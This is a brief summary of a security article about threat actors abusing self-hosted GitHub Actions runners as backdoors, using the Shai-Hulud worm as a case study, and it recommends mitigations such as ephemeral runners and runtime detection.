How threat actors are using self-hosted GitHub Actions runners as backdoors

Threat actors are exploiting self-hosted GitHub Actions runners as backdoors, allowing them to maintain persistent access to compromised systems by using trusted communication channels that evade traditional network defenses. The Shai-Hulud worm exemplifies this threat by using GitHub's infrastructure to establish rogue runners after compromising developer machines. The attackers leverage intentionally vulnerable workflows to execute arbitrary code, posing a significant security risk due to the runners' access to internal networks and cached credentials. The article recommends several mitigation strategies, including using ephemeral runners, restricting runner access to trusted repositories, and implementing runtime detection for persistence techniques to counteract these threats effectively. The case study of the Shai-Hulud campaign highlights the need for organizations to treat the security of self-hosted runners as a priority to prevent attackers from gaining privileged access to critical infrastructure.